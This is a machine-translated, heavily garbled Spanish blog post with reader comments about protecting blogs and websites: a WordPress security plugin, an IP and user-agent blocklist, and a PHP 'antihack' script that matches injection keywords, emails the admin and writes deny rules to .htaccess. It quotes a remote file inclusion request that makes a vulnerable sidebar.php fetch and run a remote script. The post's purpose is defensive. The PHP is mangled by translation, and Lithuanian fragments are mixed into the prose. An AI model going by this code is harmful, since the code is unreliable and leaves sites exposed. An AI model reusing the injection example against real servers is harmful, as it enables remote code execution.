Es necesario blog y la seguridad web
Usted probablemente sabe que en muchos casos, las páginas web o blogs intentar hackear, lío, contaminar muchos comentarios anónimos sin sentido de forma automática, con algunas secuencias de comandos. Por supuesto que muy a menudo se aplica al modo manual tienes ni idea de qué es un número bastante impresionante casos de Abies, un método de defensa que realmente es -.. Solicitudes de cheques, y otros parámetros IP enviado a los malhechores, y para bloquearlos. Sólo tiene que usar mis métodos propuestos, no sólo para defenderse, sino también para descubrir hasta qué punto y con qué frecuencia están atacando. Más información ...
Protección Blog
Aunque el directorio ofrece un "manual" de usar Wordpress es una protección especial que permite a un sitio más seguro y limpio - Plugin de Seguridad TimesToCome . Después de instalar este plugin agregar parámetros de seguridad. Personalmente, yo uso la siguiente dirección IP bloqueada, el agente de usuario y consultas, que forman parte de la razón, como lo llamó la show aquí (también puede usar sus registros). Y a pesar de que se puede ver incluso en Firefox, Internet Explorer - a menudo se llama bots.
Advertencia. Nepriisiimu responsabilidad alguna por aquí proporcionada bloqueado la IP, la de agente de usuario, las consultas, dejar a cada visitante para decidir si cualquier registro es la adecuada.
| IP bloqueada: (Esta es la lista de IP desterrado :) | Agentes de usuario bloqueadas (Esta es tu lista de agentes desterrado) | Las solicitudes bloqueadas (Esta es su lista negra de solicitud) |
12.192.82.221 | AnotherBot | $ _GET |
¿Qué es la consulta y por qué se necesita para bloquear? Digamos que su sitio es una laguna o simplemente asume el horizonte papuolėte ofensivo (pero a menudo sólo por atacar a las preguntas ofensivas en una fila).
Supongamos que un archivo no seguro sidebar.php pasado las consultas sidebar.php variable Variable? VARIABLE = http://www.kompiuteriszombis.com/botas.txt, el servidor se ejecutará secuencias de comandos botas.txt, y se puede decir, en la mayoría de los casos, el servidor ya está hackeado.
Seguridad del sitio.
Si usted tiene un sitio web, usted puede usar este script, es necesario guardarlo en tu index.php, y cambiar nemapirškite email@email.com en su correo electrónico. e-mail
/ ******************************* ANTIHACK START **************** ************** /
/ / Hora de la inyección
Req $ = $ _SERVER ['REQUEST_URI'];
$ Cadena = explode (, $ Req "?");
$ = $ Mi_url Cadena [0];
$ = $ Restaurantes Cadena [1];
/ / Aquí puedes poner tus cadenas de sospechas a su voluntad. Sólo tenga cuidado de
/ / No coincidencias pregunte a su URL con las variables y parámetros
$ Inyecc = '/ script | http | <|> | 3c% |% 3e | SELECT | UNION | Actualización | exe | ejecutivo | INSERT | tmp / i';
/ / Detección
if (preg_match ($ inyecc, $ Resto) && $ _REQUEST ['FullUrl']) {
/ / Hacer algo, en el ejemplo de enviar una alerta por e-mail al administrador
/ / $ Ip = $ HTTP_SERVER_VARS ["http_client_ip"];
$ Ip = $ _SERVER ['REMOTE_ADDR'];
= $ $ Reenviados HTTP_SERVER_VARS ['HTTP_X_FORWARDED_FOR'];
$ = $ RemoteAddress HTTP_SERVER_VARS ["REMOTE_ADDR"];
$ Mensaje = "ataque de inyección de mi_url $ \ n \ nchain: $ Resto \ n \ n
De: (IP-forwa-RA): - $ ip - $ reenviado - $ remoteAddress \ n \ n
Fin --- ------- ";
Correo electrónico ( email@email.com , "ataque de inyección", $ mensaje,
"De:" info @ {$ _SERVER ['SERVER_NAME']} ","-fwebmaster @ {$ _SERVER ['SERVER_NAME']} ");
# # # # Uzbaninam también. Htaccess
$ Fh = fopen ('htaccess.', 'A') or die ("No se pudo abrir el archivo.");
$ Towrite = "\ n # $ remoteAddress - $ resto";
$ Towrite = "\ Ndeny desde $ ip \ n".;
fwrite ($ fh, $ towrite);
fclose ($ fh);
# # # #
/ / Matar el mensaje y la ejecución
'url ilegal "eco;
die ();
}
/ ******************************* FIN ANTIHACK **************** ************** /
2008 12 20 10:12
Por ejemplo hace mucho tiempo dalikams Apache mod_security se crea - que no es necesario reinventar la rueda.
En cuanto a preg'o - no se menciona en "ftp" protocolo de consulta "Eliminar SQL. También se examina no sólo la consulta, pero los nombres de variables - que antes de usar este código, cada uno debe tener en cuenta que es significativo que el uso
Beja, inyección SQL se puede hacer y otra vez a la izquierda de la "?" Dirección Eančia.
Si el código del sistema está torcida - sólo una petición GET no será suficiente protección, la necesidad de filtrar los mensajes y las cookies.
Sería mucho más agradable para ver los comentarios del código de Lituania en todas partes, no sólo en algunos lugares.
Bueno, los certificados para el archivo htaccess -. No es el más seguro de la ocupación. Por supuesto, todo depende del sistema host.